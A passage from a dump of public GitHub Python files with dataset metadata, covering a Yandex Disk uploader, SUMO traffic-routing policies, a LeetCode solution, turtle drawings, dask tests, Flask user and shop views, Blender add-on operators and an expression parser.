params={'path' : os.path.basename(file_directory), 'overwrite' : 'true'},\n headers=HEADERS) \n step1 = step1.json()\n href = step1['href']\n with open (file_directory) as f:\n step2 = requests.put(href, files={'file': f})\n if step2.status_code == 201:\n print('Файл успешно загружен')\n else:\n print('Что-то пошло не так') \n\nif __name__ == '__main__':\n uploader = YaUploader(token)\n result = uploader.upload(file_directory)\n \n\n\n","repo_name":"German200597/yandex","sub_path":"yandex_api.py","file_name":"yandex_api.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71048721707","text":"from abc import ABC, abstractmethod\nfrom operator import le\nimport random\nimport os\nimport sys\nimport copy\nfrom core.Util import *\nif 'SUMO_HOME' in os.environ:\n tools = os.path.join(os.environ['SUMO_HOME'], 'tools')\n sys.path.append(tools)\nelse:\n sys.exit(\"No environment variable SUMO_HOME!\")\nimport traci\nimport sumolib\n\nSTRAIGHT = \"s\"\nTURN_AROUND = \"t\"\nLEFT = \"l\"\nRIGHT = \"r\"\nSLIGHT_LEFT = \"L\"\nSLIGHT_RIGHT = \"R\"\n\nclass RouteController(ABC):\n \"\"\"\n Base class for routing policy\n\n To implement a scheduling algorithm, implement the make_decisions() method.\n Please use the boilerplate code from the example, and implement your algorithm between\n the 'Your algo...' comments.\n\n make_decisions takes in a list of vehicles and network information (connection_info).\n Using this data, it should return a dictionary of {vehicle_id: decision}, where \"decision\"\n is one of the directions defined by SUMO (see constants above). Any scheduling algorithm\n may be injected into the simulation, as long as it is wrapped by the RouteController class\n and implements the make_decisions method.\n\n :param connection_info: object containing network information, including:\n - out_going_edges_dict {edge_id: {direction: out_edge}}\n - edge_length_dict {edge_id: edge_length}\n - edge_index_dict {edge_index_dict} keep track of edge ids by an index\n - edge_vehicle_count {edge_id: number of vehicles at edge}\n - edge_list [edge_id]\n\n \"\"\"\n def __init__(self, connection_info: ConnectionInfo):\n self.connection_info = connection_info\n self.direction_choices = [STRAIGHT, TURN_AROUND, SLIGHT_RIGHT, RIGHT, SLIGHT_LEFT, LEFT]\n\n ''' when testing vehicle current speed it always is 0 for some reason, so we assum that the path_length can never exceed 20\n because that is where the while loop is at\n \n this means that if the first choice is given to the compute_local_target is longer than 20, it will disregard other choices and go with that one.\n or the combination of all the paths that are less than 20'''\n def compute_local_target(self, decision_list, vehicle):\n current_target_edge = vehicle.current_edge\n try:\n path_length = 0\n i = 0\n #print(\"\\ninside compute_local_target - vehicle current speed: {}\".format(vehicle.current_speed))\n #the while is used to make sure the vehicle will not assume it arrives the destination beacuse the target edge is too short.\n while path_length <= max(vehicle.current_speed, 20):\n \n if current_target_edge == vehicle.destination:\n break\n if i >= len(decision_list):\n #print(\"Throwing userwarning, i:{} - len(decision_list):{}\".format(i, len(decision_list)))\n raise UserWarning(\n \"Not enough decisions provided to compute valid local target. TRACI will remove vehicle.\"\n )\n\n choice = decision_list[i]\n if choice not in self.connection_info.outgoing_edges_dict[current_target_edge]:\n raise UserWarning(\n \"Invalid direction. TRACI will remove vehicle.\"\n )\n current_target_edge = self.connection_info.outgoing_edges_dict[current_target_edge][choice]\n path_length += self.connection_info.edge_length_dict[current_target_edge]\n #print(\"current_target_edge1:{}\".format(current_target_edge))\n #print(\"Current edge length:{} - path_length:{}\".format(self.connection_info.edge_length_dict[current_target_edge], path_length))\n\n if i > 0:\n if decision_list[i - 1] == decision_list[i] and decision_list[i] == 't':\n # stuck in a turnaround loop, let TRACI remove vehicle\n #print(\"current_target_edge2:{}\".format(current_target_edge))\n return current_target_edge\n\n i += 1\n\n except UserWarning as warning:\n print(warning)\n\n return current_target_edge\n\n\n @abstractmethod\n def make_decisions(self, vehicles, connection_info):\n pass\n\n\nclass RandomPolicy(RouteController):\n \"\"\"\n Example class for a custom scheduling algorithm.\n Utilizes a random decision policy until vehicle destination is within reach,\n then targets the vehicle destination.\n \"\"\"\n def __init__(self, connection_info):\n super().__init__(connection_info)\n\n def make_decisions(self, vehicles, connection_info):\n \"\"\"\n A custom scheduling algorithm can be written in between the 'Your algo...' comments.\n -For each car in the vehicle batch, your algorithm should provide a list of future decisions.\n -Sometimes short paths result in the vehicle reaching its local TRACI destination before reaching its\n true global destination. In order to counteract this, ask for a list of decisions rather than just one.\n -This list of decisions is sent to a function that returns the 'closest viable target' edge\n reachable by the decisions - it is not the case that all decisions will always be consumed.\n As soon as there is enough distance between the current edge and the target edge, the compute_target_edge\n function will return.\n -The 'closest viable edge' is a local target that is used by TRACI to control vehicles\n -The closest viable edge should always be far enough away to ensure that the vehicle is not removed\n from the simulation by TRACI before the vehicle reaches its true destination\n\n :param vehicles: list of vehicles to make routing decisions for\n :param connection_info: object containing network information\n :return: local_targets: {vehicle_id, target_edge}, where target_edge is a local target to send to TRACI\n \"\"\"\n\n local_targets = {}\n for vehicle in vehicles:\n start_edge = vehicle.current_edge\n print(\"{}: current - {}, destination - {}, deadline - {}\".format(vehicle.vehicle_id, vehicle.current_edge, vehicle.destination, vehicle.deadline))\n '''\n Your algo starts here\n '''\n decision_list = []\n\n i = 0\n while i < 10: # choose the number of decisions to make in advanced; depends on the algorithm and network\n choice = self.direction_choices[random.randint(0, 5)] # 6 choices available in total\n\n # dead end\n if len(self.connection_info.outgoing_edges_dict[start_edge].keys()) == 0:\n break\n\n # make sure to check if it's a valid edge\n if choice in self.connection_info.outgoing_edges_dict[start_edge].keys():\n decision_list.append(choice)\n start_edge = self.connection_info.outgoing_edges_dict[start_edge][choice]\n\n if i > 0:\n if decision_list[i-1] == decision_list[i] and decision_list[i] == 't':\n # stuck in a turnaround loop, let TRACI remove vehicle\n break\n\n i += 1\n\n '''\n Your algo ends here\n '''\n x = self.compute_local_target(decision_list, vehicle)\n print(\"compute_local_target returns:{} - with decision list:{}\".format(x, decision_list))\n local_targets[vehicle.vehicle_id] = x\n\n # for vehicle in vehicles:\n # current_edge = vehicle.current_edge\n # if current_edge not in self.connection_info.outgoing_edges_dict.keys():\n # continue\n # for direction, outgoing_edge in self.connection_info.outgoing_edges_dict[current_edge].items():\n # print(\"Current vehicle: {}\".format(vehicle.vehicle_id))\n # print(\"current edge: {} - direction: {} - edge:{}\".format(current_edge,direction, outgoing_edge))\n # print(\"Vehicles on the potential edge: {}\".format(self.connection_info.edge_vehicle_count[outgoing_edge]))\n # print(\"\\n\")\n\n return local_targets\n\n\nclass NathanPolicy(RouteController):\n def __init__(self, connection_info):\n super().__init__(connection_info)\n \n def make_decisions(self, vehicles, connection_info):\n \"\"\"\n :param vehicles: list of vehicles to make routing decisions for\n :param connection_info: object containing network information\n :return: local_targets: {vehicle_id, target_edge}, where target_edge is a local target to send to TRACI\n \"\"\"\n local_targets = {}\n\n if len(vehicles) == 0:\n return local_targets\n\n\n # create edge_vehicle { edge_id : [vehicle OBJECT]} to keep track of all the vehicles that on the same edge\n edge_vehicle = {}\n for vehicle in vehicles:\n if vehicle.current_edge not in self.connection_info.outgoing_edges_dict.keys():\n continue\n if vehicle.current_edge in edge_vehicle:\n edge_vehicle[vehicle.current_edge].append(vehicle)\n else:\n edge_vehicle[vehicle.current_edge] = list()\n edge_vehicle[vehicle.current_edge].append(vehicle)\n # sort all vehicles by their deadline in edge_vehicles values \n for edge, v_list in edge_vehicle.items():\n v_list.sort(key=lambda x: x.deadline)\n\n\n #create vehicle_decisionList {vehicle OBJECT : [decision list]} because instead of sending decision list to the\n #local target we wait to check for congestion\n vehicle_decisionList = {}\n for edge, vehicles in edge_vehicle.items():\n for vehicle in vehicles:\n #instantiate a list of decision for each vehicle\n vehicle_decisionList[vehicle] = list()\n\n # --- start dijkstra ---\n # apply dijkstra to each vehicle in edge_vehicle DS\n for edge, vehicles in edge_vehicle.items():\n #below is copied from dijkstra \n for vehicle in vehicles:\n #print(\"---------------------------\")\n #print(\"{}: current - {}, destination - {}\".format(vehicle.vehicle_id, vehicle.current_edge, vehicle.destination))\n decision_list = []\n unvisited = {edge: 1000000000 for edge in self.connection_info.edge_list} # map of unvisited edges {edge_id : distance}\n visited = {} # map of visited edges\n current_edge = vehicle.current_edge\n #print(\"vehicle current_edge length:{}\".format(self.connection_info.edge_length_dict[current_edge]))\n\n #print(\"\\n------- getting into while loop ----------\\n\")\n #vehicle is at the beginning of the edge so current edge length counts too\n current_distance = self.connection_info.edge_length_dict[current_edge]\n unvisited[current_edge] = current_distance\n #stores shortest path to each edge using directions [edge_id]\n path_lists = {edge: [] for edge in self.connection_info.edge_list} \n \n while True:\n if current_edge not in self.connection_info.outgoing_edges_dict.keys():\n continue\n for direction, outgoing_edge in self.connection_info.outgoing_edges_dict[current_edge].items():\n #print(\"----- in for loop -----\")\n if outgoing_edge not in unvisited:\n continue\n edge_length = self.connection_info.edge_length_dict[outgoing_edge]\n new_distance = current_distance + edge_length\n #univisited length are set to 100000 so this is almost always true \n if new_distance < unvisited[outgoing_edge]:\n '''\n print(\"\\nchecking direction:{} - edge:{}\".format(direction, outgoing_edge))\n print(\"new distance < outgoing_edge length\")\n print(\"new_distance = current_distance + edge_length = {}\".format(new_distance))\n print(\"unvisited[outgoing_edge]: {}\".format(unvisited[outgoing_edge]))\n '''\n #distance to get to this 'outgoing_edge' is now 'new_distance'\n unvisited[outgoing_edge] = new_distance\n\n #path_list[current_edge] is initially set to empty array\n #so we assgin current_path to that empty array so we can modify it\n current_path = copy.deepcopy(path_lists[current_edge])\n \n #append this new shortest path to current_edge; example: path_list[E9] = [s , l , s , r] \n #[s, l , s , r] is current_path\n current_path.append(direction)\n # reassign path_list[E9] to current path [s,l,s,r]\n path_lists[outgoing_edge] = copy.deepcopy(current_path)\n #print(\"current path_list[{}]:{}\".format(outgoing_edge, path_lists[outgoing_edge]))\n # NOT nathan print(\"{} + {} : {} + {}\".format(path_lists[current_edge], direction, path_edge_lists[current_edge], outgoing_edge))\n #print(\"---- out for loop ----\")\n visited[current_edge] = current_distance\n del unvisited[current_edge]\n if not unvisited:\n break\n if current_edge==vehicle.destination:\n break\n #update possible_edge every time we modify - del unvisited above\n possible_edges = [edge for edge in unvisited.items() if edge[1]]\n\n #sort by x[1] meaning distance, and [0] meaning we take the smallest distance\n #and set our current_edge to that value\n current_edge, current_distance = sorted(possible_edges, key=lambda x: x[1])[0]\n '''\n print(\"\\npossible edge:{}\".format(possible_edges))\n print(\"\\ncurrent_edge:{}\".format(current_edge))\n print(\"current_edge length:{}\".format(self.connection_info.edge_length_dict[current_edge]))\n print(\"current_distance:{}\".format(current_distance))\n print(\"\\n ---------- repeating while loop ----------------\\n\")\n #print('{}:{}------------'.format(current_edge, current_distance))\n '''\n #current_edge = vehicle.current_edge - not NATHAN\n #print(\"\\nout of while true loop -----\")\n #print(\"\\npath_list:{}\".format(path_lists))\n for direction in path_lists[vehicle.destination]:\n decision_list.append(direction)\n #print(\"\\ndecision_list:{}\".format(decision_list))\n vehicle_decisionList[vehicle] = decision_list\n\n #----- outside dijkstra method------\n # print(\"\\n ---- testing vehicle and destination list:\")\n # for vehicle, decisionList in vehicle_decisionList.items():\n # print(\"vehicle:{} - decision_list:{}\".format(vehicle.vehicle_id, decisionList))\n\n '''\n check if route vehicle is gonna take is full ( count > 2)\n\n if yes then create a dict outEdge_count {direction : count}\n then sort by count on that dict \n then send the lowest one to decision list \n and append that to local target\n\n if no, then append like dijkstra would have \n '''\n for vehicle, decision_list in vehicle_decisionList.items():\n if len(decision_list) == 0:\n local_targets[vehicle.vehicle_id] = self.compute_local_target(decision_list, vehicle)\n continue \n #the next 3 lines is used to check if vehicle next item is its destination then we dont need to do any work on it\n direction_first_item_in_decision_list = decision_list[0]\n edge_first_item_in_decision_list = self.connection_info.outgoing_edges_dict[vehicle.current_edge][direction_first_item_in_decision_list]\n if edge_first_item_in_decision_list == vehicle.destination:\n local_targets[vehicle.vehicle_id] = self.compute_local_target(decision_list, vehicle)\n continue\n\n #getting the next edge id \n nextEdge_id = self.connection_info.outgoing_edges_dict[vehicle.current_edge][decision_list[0]]\n choices_available = len(self.connection_info.outgoing_edges_dict[vehicle.current_edge])\n #if the next edge in the vehicle is too crowded (4) and there are other choices available, then we re-route the vehicle\n if self.connection_info.edge_vehicle_count[nextEdge_id] >= 10 and choices_available > 1 and len(decision_list) > 4:\n #gather all the choices available and send to the smallest count choice\n outEdgeDirection_count = {}\n #explore all the route available to the vehicle in outgoing_edges_dict\n for direction, outEdge_id in self.connection_info.outgoing_edges_dict[vehicle.current_edge].items():\n #if the 'possible' edge that we are sending the vehicle to is a dead end (no routes available in outgoing_edge)\n # then we dont add (meaning if len is not 0 then we add)\n if len(self.connection_info.outgoing_edges_dict[outEdge_id].items()) != 0:\n outEdgeDirection_count[direction] = self.connection_info.edge_vehicle_count[outEdge_id]\n outEdgeDirection_count = dict(sorted(outEdgeDirection_count.items(), key=lambda item: item[1]))\n\n \n # test sort\n #print(\"\\n-- testing outEdge_count sort:{}\\n\".format(outEdge_count))\n new_list = list()\n new_list.append(list(outEdgeDirection_count.keys())[0])\n # print(\"\\nold_list:{}\".format(decision_list))\n # print(\"\\nnew list:{}\".format(new_list))\n local_targets[vehicle.vehicle_id] = self.compute_local_target(new_list, vehicle)\n\n else:\n local_targets[vehicle.vehicle_id] = self.compute_local_target(decision_list, vehicle)\n # print(\"------\\nlocal_targets:{}\".format(local_targets))\n return local_targets ","repo_name":"nathanguyenn/STR_Nathan_Nguyen","sub_path":"Selfless-Traffic-Routing-Testbed/controller/RouteController.py","file_name":"RouteController.py","file_ext":"py","file_size_in_byte":18855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33759673048","text":"# -*- coding: utf-8 -*-\n\"\"\"\n @Time : 2020-09-26 16:30\n @Author : QDY\n @FileName: 1590. 使数组和能被 P 整除.py\n @Software: PyCharm\n\"\"\"\n\"\"\"\n给你一个正整数数组nums,请你移除 最短子数组(可以为 空),使得剩余元素的 和能被 p整除。 不允许将整个数组都移除。\n请你返回你需要移除的最短子数组的长度,如果无法满足题目要求,返回 -1。\n子数组定义为原数组中连续的一组元素。\n\n示例 1:\n输入:nums = [3,1,4,2], p = 6\n输出:1\n解释:nums 中元素和为 10,不能被 p 整除。我们可以移除子数组 [4] ,剩余元素的和为 6 。\n\n示例 2:\n输入:nums = [6,3,5,2], p = 9\n输出:2\n解释:我们无法移除任何一个元素使得和被 9 整除,最优方案是移除子数组 [5,2] ,剩余元素为 [6,3],和为 9 。\n\n示例3:\n输入:nums = [1,2,3], p = 3\n输出:0\n解释:和恰好为 6 ,已经能被 3 整除了。所以我们不需要移除任何元素。\n\n示例 4:\n输入:nums = [1,2,3], p = 7\n输出:-1\n解释:没有任何方案使得移除子数组后剩余元素的和被 7 整除。\n\n示例 5:\n输入:nums = [1000000000,1000000000,1000000000], p = 3\n输出:0\n\n提示:\n1 <= nums.length <= 105\n1 <= nums[i] <= 109\n1 <= p <= 109\n\"\"\"\n\n\nclass Solution:\n def minSubarray(self, nums, p: int) -> int:\n mod = sum(nums) % p\n if mod == 0: return 0\n N = len(nums)\n prefix, res = 0, float('inf')\n remainder = {0: -1} # 记录前缀和的余数最后出现的id\n # for i in range(N): # 找余数为mod的最短子数组\n # prefix += nums[i]\n # r = prefix % p\n # remainder[r] = i\n # if r < mod and r-mod+p in remainder:\n # # 若nums[:j+1]的和的余数=r-mod+p,则nums[j+1:i+1]的和的余数为mod\n # res = min(res, i - remainder[r-mod+p])\n # elif r >= mod and r-mod in remainder:\n # # 若nums[:j+1]的和的余数=r-mod,则nums[j+1:i+1]的和的余数为mod\n # res = min(res, i - remainder[r-mod])\n for i in range(N):\n prefix = (prefix + nums[i]) % p\n remainder[prefix] = i\n r = (prefix - mod) % p\n if r in remainder:\n res = min(res, i - remainder[r])\n return res if res < N else -1\n","repo_name":"QDylan/Learning-","sub_path":"Leetcode/1590. 使数组和能被 P 整除.py","file_name":"1590. 使数组和能被 P 整除.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18302257951","text":"import turtle\n\ns = turtle.getscreen()\nt = turtle.Turtle()\n\n\"\"\"\nseeing if you did two three digit numbers\n\"\"\"\n\nfor x in range(6):\n base_length = 50\n length = base_length * 2\n \n t.right(200)\n t.forward(base_length)\n \n t.right(100)\n t.forward(length)","repo_name":"GmanRiff/Learning_With_Turtle","sub_path":"Turtle_Practice_01.py","file_name":"Turtle_Practice_01.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1327830613","text":"import turtle as t\n\n\ndef t1():\n \"\"\"绘制多个同切圆\"\"\"\n for i in range(4):\n t.pensize(i**2)\n t.circle(20*i)\n t.pencolor('red')\n t.done()\n\n\ndef t2():\n \"\"\"绘制五角星\"\"\"\n t.pu()\n t.bk(100)\n t.pd()\n t.color('red', 'red')\n t.begin_fill()\n for i in range(5):\n t.fd(200)\n t.rt(144)\n # t.right(144) # 两个right 就是五边形\n t.end_fill()\n t.done()\n\n\ndef t3():\n t.pu()\n t.fd(-100)\n t.pd()\n t.pencolor(\"red\")\n for i in range(3):\n t.circle(-90, 90)\n t.circle(90, -90)\n t.done()\n t.fd(100)\n\n\nif __name__ == '__main__':\n # t1()\n # t2()\n t3()","repo_name":"kekeFu/Python2020","sub_path":"test_8_graph/_2_circle.py","file_name":"_2_circle.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28518904754","text":"from multiprocessing.pool import ThreadPool\nimport threading\nfrom threading import Thread\nfrom time import time, sleep\n\nimport pytest\n\nfrom dask.context import set_options\nfrom dask.threaded import get\nfrom dask.utils_test import inc, add\n\n\ndef test_get():\n dsk = {'x': 1, 'y': 2, 'z': (inc, 'x'), 'w': (add, 'z', 'y')}\n assert get(dsk, 'w') == 4\n assert get(dsk, ['w', 'z']) == (4, 2)\n\n\ndef test_nested_get():\n dsk = {'x': 1, 'y': 2, 'a': (add, 'x', 'y'), 'b': (sum, ['x', 'y'])}\n assert get(dsk, ['a', 'b']) == (3, 3)\n\n\ndef test_get_without_computation():\n dsk = {'x': 1}\n assert get(dsk, 'x') == 1\n\n\ndef bad(x):\n raise ValueError()\n\n\ndef test_exceptions_rise_to_top():\n dsk = {'x': 1, 'y': (bad, 'x')}\n pytest.raises(ValueError, lambda: get(dsk, 'y'))\n\n\ndef test_reuse_pool():\n pool = ThreadPool()\n with set_options(pool=pool):\n assert get({'x': (inc, 1)}, 'x') == 2\n assert get({'x': (inc, 1)}, 'x') == 2\n\n\ndef test_threaded_within_thread():\n L = []\n\n def f(i):\n result = get({'x': (lambda: i,)}, 'x', num_workers=2)\n L.append(result)\n\n before = threading.active_count()\n\n for i in range(20):\n t = Thread(target=f, args=(1,))\n t.daemon = True\n t.start()\n t.join()\n assert L == [1]\n del L[:]\n\n start = time() # wait for most threads to join\n while threading.active_count() > before + 10:\n sleep(0.01)\n assert time() < start + 5\n\n\ndef test_dont_spawn_too_many_threads():\n before = threading.active_count()\n\n dsk = {('x', i): (lambda: i,) for i in range(10)}\n dsk['x'] = (sum, list(dsk))\n for i in range(20):\n get(dsk, 'x', num_workers=4)\n\n after = threading.active_count()\n\n assert after <= before + 8\n\n\ndef test_thread_safety():\n def f(x):\n return 1\n\n dsk = {'x': (sleep, 0.05), 'y': (f, 'x')}\n\n L = []\n\n def test_f():\n L.append(get(dsk, 'y'))\n\n threads = []\n for i in range(20):\n t = Thread(target=test_f)\n t.daemon = True\n t.start()\n threads.append(t)\n\n for thread in threads:\n thread.join()\n\n assert L == [1] * 20\n","repo_name":"jeetmehta/Lung-Cancer-Classification","sub_path":"syde-522-env/lib/python2.7/site-packages/dask/tests/test_threaded.py","file_name":"test_threaded.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"37"} +{"seq_id":"70321263467","text":"from flask import Blueprint, request, jsonify, g\nfrom forms.user import UserCreateForm\nfrom models.user import User\nfrom app import jwt\nfrom libraries.authentification import login_required\nfrom .chat import connected_users\nfrom underscore import _\n\nuser_view = Blueprint('user_view', __name__)\n\n\n@user_view.route('/user', methods=['POST'])\ndef create():\n form = UserCreateForm.from_json(request.get_json())\n\n if not form.validate():\n return jsonify(form.errors), 400\n\n user = User()\n user.email = form.data.get('email')\n user.first_name = form.data.get('first_name')\n user.last_name = form.data.get('last_name')\n user.avatar = form.data.get('avatar', None)\n user.password = User.make_password(form.data.get('password'))\n user.save()\n\n access_token = jwt.jwt_encode_callback(user)\n\n return jsonify({'user': user.serialize(), 'access_token': access_token.decode('utf-8')}), 200\n\n\n@user_view.route('/user/list', methods=['GET'])\n@login_required()\ndef list():\n users = User.where('id', '!=', g.user['id']).get().serialize()\n\n for user in users:\n client = _.findWhere(connected_users, {'id': user['id']})\n user['online'] = True if client else False\n user['username'] = \"%s %s\" % (user['first_name'],user['last_name'])\n\n\n return jsonify(users), 200\n\n\n@user_view.route('/user/', methods=['GET'])\n@login_required()\ndef user(id):\n user = User.find(id)\n if not user:\n return jsonify({}), 404\n\n return jsonify(user.serialize()), 200\n","repo_name":"andriy-sa/Andy-Chat","sub_path":"views/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"40835715357","text":"import bpy\nfrom bpy.types import Operator\nfrom bpy.props import StringProperty, IntProperty\nfrom ..blocks.block_data import UI_Block\nfrom ..io import save_actual_ui_state\nfrom ... import __package__ as main_package\n\n\nclass BAS_OT_clear_custom_ui(Operator):\n bl_idname = \"bas.clear_custom_ui_preset\"\n bl_label = \"\"\n bl_description = \"Clear Custom UI\"\n def execute(self, context):\n UI_Block.clear()\n self.report({'INFO'}, \"Preset has been cleared\")\n return {'FINISHED'}\n\nclass BAS_OT_remove_custom_ui(Operator):\n bl_idname = 'bas.remove_custom_ui_preset'\n bl_label = \"\"\n bl_description = \"Remove Custom UI\"\n def execute(self, context):\n from ..io import remove_custom_ui\n remove_custom_ui(context)\n self.report({'INFO'}, \"Preset has been removed\")\n return {'FINISHED'}\n\nclass BAS_OT_create_custom_ui_preset(Operator):\n bl_idname = \"bas.create_custom_ui_preset\"\n bl_label = \"\"\n bl_description = \"Create Custom UI Preset\"\n\n name : StringProperty(default=\"My preset\", name=\"Preset Name\")\n\n def execute(self, context):\n if self.name == '' or self.name == ' ':\n self.report({'ERROR'}, \"Preset name is invalid\")\n return {'CANCELLED'}\n from ..io import create_custom_ui_preset\n if not create_custom_ui_preset(context, self.name):\n self.report({'ERROR'}, \"Couldn't create new preset!\")\n return {'CANCELLED'}\n self.report({'INFO'}, \"Preset %s has been created\" % self.name)\n return {'FINISHED'}\n\n def invoke(self, context, event):\n wm = context.window_manager\n return wm.invoke_props_dialog(self)\n\n\nclass BAS_OT_duplicate_custom_ui_preset(Operator):\n bl_idname = \"bas.duplicate_custom_ui_preset\"\n bl_label = \"\"\n bl_description = \"Duplicate Custom UI Preset\"\n\n def execute(self, context):\n from ..io import duplicate_custom_ui_preset\n if not duplicate_custom_ui_preset(context):\n self.report({'ERROR'}, \"Couldn't duplicate active preset!\")\n return {'CANCELLED'}\n return {'FINISHED'}\n\n\nclass BAS_OT_reset_custom_ui_preset(Operator):\n bl_idname = \"bas.reset_custom_ui_preset\"\n bl_label = \"\"\n bl_description = \"Reset Custom UI Preset\"\n\n def execute(self, context):\n from ..io import reset_custom_ui_preset\n if not reset_custom_ui_preset(context):\n self.report({'ERROR'}, \"Couldn't reset active preset!\")\n return {'CANCELLED'}\n self.report({'INFO'}, \"Preset has been reset\")\n return {'FINISHED'}\n\n\nclasses = [\n BAS_OT_create_custom_ui_preset,\n BAS_OT_duplicate_custom_ui_preset,\n BAS_OT_reset_custom_ui_preset,\n BAS_OT_clear_custom_ui,\n BAS_OT_remove_custom_ui\n]\n","repo_name":"jfranmatheu/Atelier-Sculpt","sub_path":"AtelierSculpt/custom_ui/ops/ui_presets.py","file_name":"ui_presets.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"37"} +{"seq_id":"23238281428","text":"from typing import Callable\n\nfrom day1_lexer import TokenType, ParserError\n\nfrom .ast import *\nfrom .parser import FIRST_SET, Reader, parse_exp_list\n\n\ndef parse_exp(reader: Reader) -> Exp:\n return parse_or(reader)\n\n\ndef exp_parser_template(\n first_sym: set,\n upper: Callable[[Reader], Exp]\n ) -> Callable[[Reader], Exp]:\n \"\"\"\n Just a function builder.\n \"\"\"\n\n def parse_infix(reader: Reader) -> Exp:\n \"\"\"\n Parses an infix operation whose precedence is the same as 'mul' and 'div'.\n\n Check source_grammar.cf for a definitive grammar guide. Note the\n elimination of left recursions.\n \"\"\"\n\n def parse_partial(reader: Reader) -> Callable[[Exp], Exp]:\n # since there is no AST node directly corresponding to the\n # eliminated version of a binary operation, a bit of currying is\n # used here for generalizablity\n\n if not reader.test_set(first_sym):\n return lambda x: x\n\n sym = reader.match(TokenType.OPERATOR)\n end = upper(reader)\n\n tail = parse_partial(reader)\n build = lambda start, sym=sym, end=end: BinOp(sym, start, end)\n\n return lambda x: tail(build(x))\n\n start_exp = upper(reader) # non-recursive non-terminals\n return parse_partial(reader)(start_exp)\n\n return parse_infix\n\n\ndef parse_exp_imm(reader: Reader) -> Exp:\n \"\"\"\n Parses a value whose construct has no binary operators (and therefore\n of the highest precedence).\n \"\"\"\n\n # note that the idea of 'checking if the FIRST_SET contains the next token\n # and then explicitly matching only one specific token' does not make much\n # sense programmatically; however, in this case we are demontrating the\n # deriving of a production from another given the starting token, and\n # therefore we abstracts everything inside each 'if' switch as simply\n # something that parses the given production derived from the tested\n # FIRST_SET\n if reader.test_set(FIRST_SET['literal']):\n return Literal(reader.match(TokenType.LITERAL))\n\n elif reader.test_set(FIRST_SET['unop_exp']):\n return UnOp(reader.match(TokenType.OPERATOR), parse_exp_imm(reader))\n\n elif reader.test_set(FIRST_SET['identifier']):\n name = reader.match(TokenType.IDENTIFIER)\n\n if reader.test('('):\n reader.match('(')\n params = parse_exp_list(reader)\n reader.match(')')\n\n return FuncCall(name, params)\n\n return VarExp(name)\n\n elif reader.test_set(FIRST_SET['paren_exp']):\n reader.match('(')\n value = parse_exp(reader)\n reader.match(')')\n\n return value\n\n else:\n raise ParserError(\n f'Token {reader.peek()} does not match the first '\n 'set of immediate values'\n )\n\n\nparse_term = exp_parser_template({'*', '/'}, parse_exp_imm)\nparse_numeric = exp_parser_template({'+', '-'}, parse_term)\nparse_compare = exp_parser_template({\n '==', '!=', '<=', '>=', '<', '>'\n}, parse_numeric)\nparse_and = exp_parser_template({'&&'}, parse_compare)\nparse_or = exp_parser_template({'||'}, parse_and)","repo_name":"davidmaamoaix/language-and-compiler-course","sub_path":"day2_parser/exp_parser.py","file_name":"exp_parser.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"15665729672","text":"from flask import Blueprint, render_template, abort, redirect, request, make_response, url_for\r\nimport os\r\nfrom . import db_session\r\nfrom .category import Category\r\nfrom forms.product import ProductForm\r\nfrom .products import Products\r\nfrom .shops import Shops\r\nfrom .colors import Colors\r\nfrom .users import Users\r\nfrom data.email import generate_email\r\nfrom flask_login import current_user, login_required\r\nfrom datetime import date\r\n\r\n\r\nuser_api = Blueprint(\r\n 'user_api',\r\n __name__,\r\n template_folder='templates'\r\n)\r\ndb_session.global_init(f\"db/penguins.db\")\r\ndb_sess = db_session.create_session()\r\n\r\n\r\n@user_api.route('/my', methods=['GET', 'POST'])\r\n@login_required\r\ndef my():\r\n user = db_sess.query(Users).filter(Users.id == current_user.id).first()\r\n now = date.today()\r\n age = now - user.birthday\r\n if request.method == 'POST':\r\n if request.form['hidden'] == 'update':\r\n if current_user.check_password(request.form['password']):\r\n user.name = request.form['name']\r\n user.surname = request.form['surname']\r\n birthday = request.form['birthday'].split('-')\r\n user.birthday = date(year=int(birthday[0]), month=int(birthday[1]), day=int(birthday[2]))\r\n if user.email != request.form['email']:\r\n if db_sess.query(Users).filter(Users.email == request.form['email']).first():\r\n return render_template('my.html', title='Личный кабинет', user=current_user,\r\n message='Пользователь с такой почтой уже существует!', age=age)\r\n generate_email(request.form['name'], request.form['email'], url_for('confirmed', _external=True))\r\n user.email = request.form['email']\r\n db_sess.commit()\r\n return redirect('/my')\r\n return render_template('my.html', title='Личный кабинет', user=current_user,\r\n message='Неверный пароль!', age=age)\r\n shop = db_sess.query(Shops).filter(Shops.id == request.form['hidden']).first()\r\n user.shops.remove(shop)\r\n db_sess.delete(shop)\r\n db_sess.commit()\r\n return redirect('/my')\r\n return render_template('my.html', title='Личный кабинет', user=current_user, age=age)\r\n\r\n\r\n@user_api.route('/add_shop', methods=['GET', 'POST'])\r\n@login_required\r\ndef add_shop():\r\n if request.method == 'POST':\r\n if db_sess.query(Shops).filter(Shops.title == request.form['title']).first() or \\\r\n db_sess.query(Shops).filter(Shops.email == request.form['email']).first():\r\n return render_template('add_shop.html', title='Создание магазина', user=current_user,\r\n message='Магазин с таким названием/почтой уже существует!')\r\n shop = Shops(title=request.form['title'],\r\n email=request.form['email'],\r\n user=current_user.id)\r\n db_sess.add(shop)\r\n db_sess.commit()\r\n user = db_sess.query(Users).filter(Users.id == current_user.id).first()\r\n user.shops.append(shop)\r\n db_sess.commit()\r\n return redirect('/my')\r\n return render_template('add_shop.html', title='Создание магазина', user=current_user)\r\n\r\n\r\n@user_api.route('/shop/', 